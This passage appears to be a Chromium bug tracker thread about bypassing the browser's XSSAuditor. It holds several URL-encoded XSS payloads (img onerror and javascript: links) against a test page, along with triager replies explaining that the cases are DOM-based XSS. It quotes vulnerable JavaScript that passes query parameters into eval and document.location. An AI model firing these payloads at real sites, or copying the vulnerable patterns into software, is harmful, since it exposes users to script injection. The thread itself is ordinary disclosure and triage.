Another Payload http://1cu.pw/xss/chrome.html?name=%3Cimg+src+onerror=alert(111.4166666666667*12)%3E

http://1cu.pw/xss/chrome.html?name=%3Csvg%3E%3Ca%3E%3Crect%20width=100%%20height=100%%20/%3E%3Cimg+src+onerror=alert(111.4166666666667*12)%3E

Another payload http://1cu.pw/xss/xss.php?name=%3Ca%20href=%22javascript:alert(1337)%22%20id=%22fuzzelement1%22%3Etest%3C/a%3E

another payload http://1cu.pw/xss/xss.php?name=%3Csvg%20width=12cm%20height=9cm%3E%3Ca%20href=%22javascript:alert(1337)%22%20id=%22fuzzelement1%22%3E%3Cimage%20href=https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJT_KSJCvJY04EL1xUBkcEPoo7bxwifkg9wDdKBRy-dCSgwfRy%20/%3E%3C/a%3E

Deleted: xsscc.jpg 71.0 KB

	xsscc.jpg 71.0 KB View Download

Able to reproduce the issue on chrome stable# 66.0.3359.181 and on latest chrome# 68.0.3436.0 using Windows-10, Ubuntu 14.04 and Mac 10.12.6. As the issue is seen from M-60(60.0.3112.0), hence considering this as Non-Regression issue.

Thanks!

is it not a vulnerability issue?


thank you

Re #8: Please see https://chromium.googlesource.com/chromium/src/+/lkcr/docs/security/faq.md#Are-XSS-filter-bypasses-considered-security-bugs

I was seen...


if any process please notify me 



Thank you

The XSSAuditor is not able to defend against persistent XSS or DOM-based XSS. as explained https://chromium.googlesource.com/chromium/src/+/lkcr/docs/security/faq.md#Are-XSS-filter-bypasses-considered-security-bugs

For all these cases, we get a script that eventually does:

        var redir = searchParams.get('redir');
	if (redir !== null) {
		document.location = redir;
	}

or 

        var index = searchParams.get('index').toString();
	eval('market.index=' + index);
	document.getElementById('p1').innerHTML = 'Current market index is ' + market.index + '.';

which are DOM-based XSS.